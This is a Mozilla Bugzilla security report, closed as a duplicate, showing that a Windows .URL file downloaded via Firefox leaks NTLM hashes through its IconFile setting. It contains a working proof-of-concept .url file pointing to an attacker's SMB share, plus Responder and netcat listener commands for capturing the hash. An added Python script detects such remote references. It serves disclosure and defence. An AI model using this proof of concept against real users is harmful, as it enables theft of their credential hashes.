Closed
Bug 1812338
Opened 2 years ago
Closed 2 years ago
.URL file can also send NTLM hashes
Categories
(Firefox :: Security, defect)
Firefox
Security
RESOLVED
DUPLICATE
of bug 1809923
People
(Reporter: haxatron1, Unassigned)
Details
(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])
Attachments
(1 file)
4.76 MB,
video/webm
On Windows, a .URL file can also send NTLM hashes via the IconFile parameter. Thus it is possible to reproduce https://bugzilla.mozilla.org/show_bug.cgi?id=1773894 using a .URL file.
Flags: sec-bounty?
STR
- Host example.url on a server

```
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
[InternetShortcut]
IDList=
URL=\\192.168.1.109\test\test.ico
IconFile=\\192.168.1.109\test\test.ico
HotKey=0
```

- Replace all instances of 192.168.1.109 with your responder IP address.
- Start responder using `responder -I eth0 -wvd`
- Create a link that downloads example.url, see that example.url is downloaded by Firefox without any warning, click Show in Folder and the hash is leaked.
Alternatively, if you don't want to download responder, you may also verify that .url files are sending the hash.
Instead of Step 2, you can start a netcat server using

```
nc -nvlp 445
```

And when you download example.url and click Show in Folder, a connection to your netcat server is made. On Windows, an SMB connection will result in auto-forwarding of the NTLM hash.
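Added example, not part of the bug report or of Firefox: a triage check that parses a downloaded .url file and reports `URL` or `IconFile` values naming a remote host, which is the condition the report relies on. The function name, the sample contents and the 192.0.2.10 address are assumptions constructed for illustration.

```python
import re

# Constructed sample with the layout shown in the report; 192.0.2.10 is a
# documentation-range placeholder, not an address from the bug.
SAMPLE_URL_FILE = r"""[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
[InternetShortcut]
IDList=
URL=\\192.0.2.10\test\test.ico
IconFile=\\192.0.2.10\test\test.ico
HotKey=0
"""

# Constructed benign shortcut: web URL plus a local icon path.
BENIGN_URL_FILE = r"""[InternetShortcut]
URL=https://example.com/
IconFile=C:\Windows\System32\shell32.dll
"""

# [InternetShortcut] keys checked here (the two the report uses).
PATH_KEYS = {"url", "iconfile"}

# UNC path (\\host\share or //host/share); \\?\ and \\.\ device paths are skipped.
UNC_RE = re.compile(r"^[\\/]{2}(?![?.][\\/])([^\\/]+)[\\/]")
# file://host/... with a non-empty host (file:///C:/... is local and not matched).
FILE_URL_RE = re.compile(r"^file:[\\/]{2}([^\\/]+)[\\/]", re.IGNORECASE)


def find_remote_refs(text):
    """Return (key, host) pairs for URL/IconFile values that name a remote host."""
    hits, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "internetshortcut" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key.lower() not in PATH_KEYS:
            continue
        match = UNC_RE.match(value) or FILE_URL_RE.match(value)
        if match:
            hits.append((key, match.group(1)))
    return hits


if __name__ == "__main__":
    for name, sample in (("sample", SAMPLE_URL_FILE), ("benign", BENIGN_URL_FILE)):
        print(name, find_remote_refs(sample))
```

A non-empty result means that merely rendering the shortcut's icon in Explorer would make Windows contact the listed host.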
Updated•2 years ago
Status: UNCONFIRMED → RESOLVED
Closed: 2 years ago
Duplicate of bug: CVE-2023-25734
Resolution: --- → DUPLICATE
Updated•2 years ago
Flags: sec-bounty? → sec-bounty-
Updated•1 year ago
Group: firefox-core-security
Updated•8 months ago
Keywords: reporter-external